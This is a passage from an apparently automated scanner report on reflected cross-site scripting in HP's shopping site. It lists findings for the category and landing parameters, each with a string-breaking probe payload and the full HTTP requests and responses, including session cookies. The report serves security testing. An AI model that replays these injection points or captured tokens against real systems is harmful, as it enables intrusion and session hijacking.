ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:09:56 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:09:56 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:09:56 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 223691

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<div id="BVReadReviewsLink" style="display:none;" href="javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=desktops&category=p7xt_seriesd244c" a=b 5931038e062&subcat1=rts&product_code=BV704AA%23ABA&catLevel=3&mc=&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');" title="javascript:retr
...[SNIP]...

1.39. http://www.shopping.hp.com/webapp/shopping/product_detail.do [category parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3c95'%3bd4d924c3cbf was submitted in the category parameter. This input was echoed as d3c95';d4d924c3cbf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_seriesd3c95'%3bd4d924c3cbf&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:03 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:03 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:03 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 223613

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
// get the catLevel, landing, category & subcat1 from the request
// Commented out below lines to remove directLink
var omni_landing = 'desktops';
var omni_category = 'p7xt_seriesd3c95';d4d924c3cbf';
var omni_catLevel = '3';
var omni_subcat1 = 'rts';

//Script added to introduce New Omniture Variables
if(omni_landing == null || omni_landing == '' || omni_lan
...[SNIP]...

1.40. http://www.shopping.hp.com/webapp/shopping/product_detail.do [category parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the category request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f2c"%3bab2d1bedb5f was submitted in the category parameter. This input was echoed as b0f2c";ab2d1bedb5f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=b0f2c"%3bab2d1bedb5f&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:00 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:00 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:00 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 223392

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...

function readReviewsLink() {
return "javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=desktops&category=b0f2c";ab2d1bedb5f&subcat1=rts&product_code=BV704AA%23ABA&catLevel=3&mc=&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');";
}

...[SNIP]...

1.41. http://www.shopping.hp.com/webapp/shopping/product_detail.do [landing parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the landing request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 692c8'%3bba9e50af53c was submitted in the landing parameter. This input was echoed as 692c8';ba9e50af53c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops692c8'%3bba9e50af53c&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:09:45 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:09:45 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:09:45 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 222484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
{
populateBV();
}

// get the catLevel, landing, category & subcat1 from the request
// Commented out below lines to remove directLink
var omni_landing = 'desktops692c8';ba9e50af53c';
var omni_category = 'p7xt_series';
var omni_catLevel = '3';
var omni_subcat1 = 'rts';

//Script added to introduce New Omniture Variables
if(omni_landin
...[SNIP]...

1.42. http://www.shopping.hp.com/webapp/shopping/product_detail.do [landing parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the landing request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca318"%20a%3db%207c7a7a1fc2f was submitted in the landing parameter. This input was echoed as ca318" a=b 7c7a7a1fc2f in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktopsca318"%20a%3db%207c7a7a1fc2f&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:09:39 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:09:39 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:09:39 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 222564

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<div id="BVReadReviewsLink" style="display:none;" href="javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=desktopsca318" a=b 7c7a7a1fc2f&category=p7xt_series&subcat1=rts&product_code=BV704AA%23ABA&catLevel=3&mc=&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');" t
...[SNIP]...

1.43. http://www.shopping.hp.com/webapp/shopping/product_detail.do [landing parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the landing request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b92ce"%3b97ca51096cb was submitted in the landing parameter. This input was echoed as b92ce";97ca51096cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktopsb92ce"%3b97ca51096cb&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
